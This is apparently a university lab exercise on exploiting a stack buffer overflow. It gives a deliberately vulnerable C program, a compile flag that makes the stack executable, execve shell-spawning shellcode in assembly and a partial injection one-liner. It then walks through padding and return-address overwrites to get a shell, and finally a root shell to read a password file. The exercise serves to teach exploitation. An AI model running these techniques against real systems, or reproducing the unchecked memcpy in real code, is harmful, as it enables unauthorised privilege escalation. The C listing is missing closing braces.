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title:Buffer Overflow Exploitation Excercise
Author: Andre Rein

Exercise: Buffer Overflow Stack

The code we will use for the exploitation is as follows:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
  char buffer[16];
  char buffer2[16];


  printf("Hello Buffers\n\n");

  for (int i=0;i<argc;i++){
    printf("argv[%d]: %s\n", i, argv[i]);

  printf("Buffer2: @%p\n", &buffer2);
  printf("Buffer : @%p\n", &buffer);

  memcpy(buffer2,argv[1], strlen(argv[1]));

  printf("Buffer2: @%p [%s]\n", &buffer2, buffer2);
  printf("Buffer : @%p [%s]\n", &buffer, buffer);

  return 0;


The code from above contains a buffer overflow vulnerability. The goal of this exercise is to exploit this vulnerability and use it to spawn a shell.

Step 1: Understand the code:

  1. Locate the buffer overflow vulnerability inside the code

  2. Compile your code as follows:

    gcc -g stack_variables/stack.c -z execstack -o output/stack_exec_stack

  3. Play around with the command line arguments and understand what happens inside the code

    ./output/stack_exec_stack parameter

    • IMPORTANT: once you get segmentation faults, use ``dmesg`` to figure out what was going on.
    • Alternatively you can also use a debugger if you are familiar using one. ``gdb`` and ``radare2`` are available.
  4. Answer the following questions:

    1. How many Bytes are available in your buffer?
    2. How many Bytes do you need to overflow until you receive a segmentation fault?

Step 2: Understand the exploit:

  1. Go to or look at the file exploit_shellcode.c or check the summary below.

    Quick summary:
    # Source #
    section .text
        global _start
          push rax           /*
          xor rdx, rdx        * Prolog
          xor rsi, rsi        */
          mov rbx,'/bin//sh' /* important line! */
          push rbx           /*
          push rsp            * setup stack frame
          pop rdi             */
          mov al, 59         /* xx refers to ??? syscall*/
          syscall            /* execute ???*/
    # shellcode (24 bytes) #
  2. Try to understand what the shellcode does. Questions:

    1. Which syscall is used by the shellcode?
    2. Why does the string for the shell use two slashes // instead of just one /?
    3. Why is the 1st parameter put in a register?
  3. Use the shellcode from above or a different one and find a way how to inject your shellcode into your buffers.

    • E.g. with python:

    ./output/stack_exec_stack $(python -c 'print "\x50..."')

  1. Figure out the padding space you will need between your shellcode inside the buffers and the return address you want to overwrite.

    • How much padding space do you need?

    `` [shellcode][...padding...][return address] ``

    Note: The padding space could be larger than you would expect, so watch carefully when the first errors occur. Use ``dmesg`` and watch what happens to the instruction pointer. If you see no changes, the padding is most likely wrong. Adjust the padding size.

  2. Figure out the correct address that points to your shellcode and overwrite the return address accordingly.

    (Note 1: X86_64 uses little endian byte order!)

    (Note 2: The last 4 Bytes of the targeted return address changes sometimes. So consider this during your exploit.)

Step 3: Test the exploit:

  1. Put everything together in a single command line argument and execute your exploit.

    • In case you were successful, you now have a sh shell prompt indicated by $
    • You can execute any command you like.
    • You can logout with ctrl+d

Step 4: Use the techniques to get the root password

  1. There is an already pre-compiled version of this program available. You can find it here: output/stack_exec_root

    • Use what you learned and exploit this program instead.

    (Note: The targeted return address may be different this time.)

    • Once you have a shell (this time this is a root shell, indicated by a #) read the contents of the file secret to get the password for the root account.


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